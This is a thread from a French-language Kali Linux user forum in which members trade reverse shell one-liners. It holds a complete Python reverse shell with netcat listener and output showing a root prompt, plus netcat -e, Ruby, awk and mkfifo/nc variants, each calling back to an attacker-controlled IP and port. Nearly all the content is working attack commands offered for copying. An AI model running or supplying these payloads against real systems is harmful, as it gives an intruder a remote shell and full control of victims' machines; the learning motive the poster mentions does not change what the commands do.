Le Forum francophone communautaire des utilisateurs de Kali linux

Tout le reste ici => Vrac => Discussion démarrée par: _john_doe le 25 octobre 2019 à 16:57:21

Titre: Reverse shell python - Linux
Posté par: _john_doe le 25 octobre 2019 à 16:57:21
Pour ceux qui aiment bien les socket, python, les file descriptor et les reverse-shell,
Une ligne de commande python bien pratique pour obtenir un reverse shell linux:
On lance d'abord netcat dans une console :
root@kali:/home# nc -lvp 666
listening on [any] 666 ...
Oui j'aime bien le port 666, mon coté satananiste
Puis cette commande python dans la console de l'ordi cible :
root@kali:/# python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.177.0.22",666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Et hop !
connect to [10.177.0.22] from kali [192.168.0.25] 52364
# whoami
root
# exit

Titre: Re : Reverse shell python - Linux
Posté par: ZeR0-@bSoLu le 25 octobre 2019 à 17:20:20
Je trouve que il y a plus efficace en one line que en python mais merci du partage ;)

Titre: Re : Reverse shell python - Linux
Posté par: _john_doe le 25 octobre 2019 à 17:31:59
yeap un simple netcat des 2 cotés suffit,  genre :
console 1:
root@kali:/# nc -lvp 666
listening on [any] 666 ...
Console 2 :
nc 10.177.0.22 666 -e/bin/bashet :
connect to [10.177.0.22] from kali [192.168.0.25] 35560Mais c'est pas drole.
Avec la commande python j'espere que ceux qui ne sont pas familier de la librairie socket et des file descriptor creuseront un peu...  ;D
Titre: Re : Reverse shell python - Linux
Posté par: ZeR0-@bSoLu le 25 octobre 2019 à 17:38:11
je pensais plus à awk ou perl ;)
Titre: Re : Reverse shell python - Linux
Posté par: _john_doe le 25 octobre 2019 à 17:50:46
juste pour t'embeter, en ruby  ;)
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.0.25","666");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Mais comme je t'aime bien une version awk alambiquée avec un shell custo :) :
awk 'BEGIN {s = "/inet/tcp/0/192.168.0.25/666"; while(42) { do{ printf "le joli shell awk pour zero >" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
Titre: Re : Reverse shell python - Linux
Posté par: ZeR0-@bSoLu le 25 octobre 2019 à 17:52:00
Ce magnifique clin d’œil ;) merci :P

rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc <IP> <PORT> > f